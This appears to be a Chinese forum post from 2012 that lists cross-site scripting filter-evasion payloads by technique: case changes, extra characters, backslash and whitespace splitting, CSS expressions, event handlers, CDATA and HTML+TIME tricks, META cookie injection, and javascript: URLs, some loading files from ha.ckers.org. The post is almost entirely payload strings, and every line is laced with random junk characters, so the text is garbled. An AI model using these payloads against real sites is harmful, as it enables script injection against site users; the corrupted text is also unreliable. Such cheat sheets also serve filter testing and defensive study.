1. 改变字符大小写
1 a# r& c% k/ k/ K! W
8 W2 q$ c O) z: o+ u" R
1 f( r7 p0 a( I8 J) E9 f ~
2 E& L2 m" T- _; U' t <sCript>alert(‘d’)</scRipT>
. P, s; o" ^0 y: p" e, l
% S( Y0 Y; P* R$ I8 R& T: \2. 利用多加一些其它字符来规避Regular Expression的检查
6 Y) T! u# @9 r% E: g1 ~; C1 \
$ M/ M) V- U. g O <<script>alert(‘c’)//<</script>
+ h3 [ A( }' D* E: r9 ^2 k$ S, H+ }) r3 C1 \: V% b+ a
<SCRIPT a=">" SRC="t.js"></SCRIPT>
$ c5 j/ q& ~% J7 p, T. ?( m( E! ]2 D, _8 E% S9 z; T
<SCRIPT =">" SRC="t.js"></SCRIPT>' b# g% f6 Y" y C
. h- N4 Q' \0 n! l5 ]/ N <SCRIPT a=">" ” SRC="t.js"></SCRIPT>/ i! v! D! Z% a* n
) c- W, q# j; r+ J; @/ s5 v <SCRIPT "a=’>’" SRC="t.js"></SCRIPT> n6 }6 W4 ~; o5 I; X; F
x" j, s9 ]6 r* k' q <SCRIPT a=`>` SRC="t.js"></SCRIPT>+ r, i- m9 j: J; x/ A' \) b
! Q+ h0 ~! [, I: }; O4 M* i, w# y <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
2 f1 H" R5 a- p) X
; l! E3 G5 C) s! O$ N& O* r3. 以其它扩展名取代.js% {5 {. ?6 b Z8 D
9 M# {6 w% Q- [) z) M- ~6 w0 U
<script src="bad.jpg"></script>
& A0 Y! h* N) P! ?) v1 L" `' A1 e, V9 y; Q a: o
4. 将Javascript写在CSS档里- ^- |$ {) X6 `9 x8 o% w
4 ]) I- R$ B( K( Y0 [
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
9 c" a$ F0 i! P( H2 w
0 l$ |( o% B r8 _% {1 {4 b( R example:8 q8 @4 D0 s/ ^1 B
9 Q; M: v+ E( T$ U% J8 V8 N body {6 t" @# r- S# |
) e4 V# K5 O6 q/ y+ Y# A8 B% g) j background-image: url(‘javascript:alert("XSS");’)
2 ^- W% P+ e2 A' B" i
2 U* ?0 o+ d: X4 | b }& E9 M- ]2 X b, t; m) O
Z( Q/ m3 x9 t
5. 在script的tag里加入一些其它字符
* N1 v+ W4 s: U5 t9 t$ V0 y7 Z! {8 [5 f* r$ C$ a
<SCRIPT/SRC="t.js"></SCRIPT>
0 w, w/ P- L. k- ]1 N1 c' q6 G% Q4 w6 ~6 D5 s" x
<SCRIPT/anyword SRC="t.js"></SCRIPT>* _% W1 @# E: @* \# `5 a
( H) W/ L$ c& s$ W& e2 G1 v$ L
6. 使用tab或是new line来规避
* ^) q$ r2 V( F/ c9 |; S! G/ h. V
<img src="jav ascr ipt:alert(‘XSS3′)">
0 X( K' A9 Q# u6 u0 d: {
* v5 V* g: C/ c <img src="jav ascr ipt:alert(‘XSS3′)">
' |6 e/ e, d0 M2 j# ~ C
) U1 o, L7 ]: X9 Q& W' b! c <IMG SRC="jav ascript:alert(‘XSS’);">% H2 c2 B9 Q0 E+ T% d: {
+ f, b& ^4 J/ b O4 ?: ? -> tag" W+ B. L5 J! H3 x+ }7 W
$ G$ G2 ]5 B# C, ~) u -> new line, l8 o/ v0 A1 A7 X! E1 t& O
' T' S: j& r) f* C: S, k5 j7. 使用"\"来规避
% |, b0 r# C4 p) \* s1 v$ ~) h0 _# u" D' X
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>7 \# g" M% m I# w2 `, ?9 {
( W. ~" [. t9 N! B; Q <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>, w- ^% |: B$ o6 @# }0 Q
' _: S) J2 \$ G; V& s <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
0 d8 Q, g" o, z7 p8 T' w: J2 u: I2 ]; L: S! L5 c8 B/ G' l4 X
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">$ D) `; @1 |; _5 J2 L
% A7 U: ?8 c9 U: R
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
X c( p9 z6 }; k }# o' j/ B4 A' U
8. 使用Hex encode来规避(也可能会把";"拿掉)" ^; k/ w: _( D O+ }+ o* i7 K
* B; {; u' N) M, B7 w <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">* k1 k: Q$ t& |# u5 ^- l/ q
$ v4 \) n3 \$ s 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
+ D3 e0 G- m# P/ d$ t+ d8 Q" h1 E7 c
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">& ?) X) V4 u" v& j
L% t! j; d4 ?4 T1 I( F9 n( ~2 S& D 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
1 T9 i b! A: p; U$ I% g& ~1 y9 l* [% l' q/ d/ x
9. script in HTML tag1 b8 u. D# U2 h9 t
6 x9 q( X4 X* ^# X, P5 O
<body onload=」alert(‘onload’)」>/ S$ }9 R, n. _3 O
/ A: h1 @7 U2 n1 i6 u onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload0 X! z. H" ` B; ]2 w/ l
* b1 ~ C) F+ z4 g( B, n1 z% g; @
10. 在swf里含有xss的code
- p8 X) y+ @0 G; u
# G4 m h9 Y* u# | <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
: Z( ?- J8 n. Y! W2 M5 m5 o" y! w# H1 l' ~
11. 利用CDATA将xss的code拆开,再组合起来。
" I& N; w2 w8 R. a
3 o2 G ~5 ]6 y/ P3 e <XML ID=I><X><C>) B. q8 A/ m* ~& Q' |& m
6 u4 b6 i( k$ W6 K' m1 l+ {8 N
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>! m. K# h2 n0 I6 w, d' m
4 _7 I6 F" z8 o g. F4 T# x8 h
</C></X>
3 E8 W# N5 c. u& ]2 A ^& c5 _% x
</xml>- M; E$ O: l5 U, j4 R$ Z" b9 t% V6 I
. T- \5 p' ^# q4 m <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
4 @0 b, e+ k$ B% `& Z7 N" p* a7 }; N0 z }# }1 U& L6 J7 W
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
% p# |, }5 I, ]( h! ~1 H: n- d8 I' ]) e5 n
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
" O$ O W; r/ m _- {7 @& u+ _* T3 U$ ~4 i
12. 利用HTML+TIME。* D. ` r. @9 o/ d9 L% s0 J/ a
; g7 ?* p5 [( u
<HTML><BODY>
0 W* N0 d" \1 u6 M& ~/ s
: y- u+ m; J1 i$ i) Q! C* ] <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> y2 X X1 @9 P* y: c4 o
" l+ n4 I: c/ ] c' b0 c
<?import namespace="t" implementation="#default#time2">
( G, \- G6 t, T- x& d( _* _3 h. L \8 y
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
6 Z3 J1 ?5 l) M
4 O" C( W* h( j- A3 q </BODY></HTML>
1 i5 p2 ?- {, J* [* ^
) w2 o# R# k3 m$ J) I# ?3 m* p0 D& {13. 透过META写入Cookie。+ c9 }" V' g8 c, ?+ t9 m( ?1 F' a
+ M; M5 X9 G5 v* U <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
5 B; {: I& h9 ]1 W' g
7 A# ~. M }- [) J: h; o3 w14. javascript in src , href , url
* l, Z# S5 u8 F$ V2 j2 [$ i6 F/ E* g* X" Q8 O
<IFRAME SRC=javascript:alert(’13′)></IFRAME>6 U. i; Y2 ?& l7 ^# ]3 X% ]( v
; E6 A! r% z* r# _3 N
<img src="javascript:alert(‘XSS3′)">$ _0 z* V* v7 f3 A9 R4 L" p
9 u1 \5 ?6 r" F) W<IMG DYNSRC="javascript:alert(‘XSS20′)">; i, J, n5 i5 o$ ^) G
* z+ b- M- ~- G" y4 ^ <IMG LOWSRC="javascript:alert(‘XSS21′)">' b l& h e' j- n4 Y M
1 c |, x3 i' n9 H <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
$ \! n; {( F8 ^9 @5 I: I& q( l, u% `8 O
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
+ b6 X2 m' {! e% D6 x/ @9 n( n. h \1 l( `& B2 v$ B
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
7 |- k+ Q/ k w) S( T( f; C
5 P% Y1 E! r! [$ A8 }. Y <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
& K% g" _8 K) `9 Y
1 _( h* O- @, q3 a <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
+ M7 K+ g% q0 C1 X& I" [
1 @! T) `9 w+ E9 v </STYLE><A CLASS=XSS></A>
$ ?' S- l J; I! k) m7 y5 e: A- |& s1 Z
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
, G7 J+ O! X0 P/ _( `( r/ ~3 E- h: k2 {3 n( F, X) T6 c5 ?
|
发表于 2012-12-31 09:59:28
收藏
支持
反对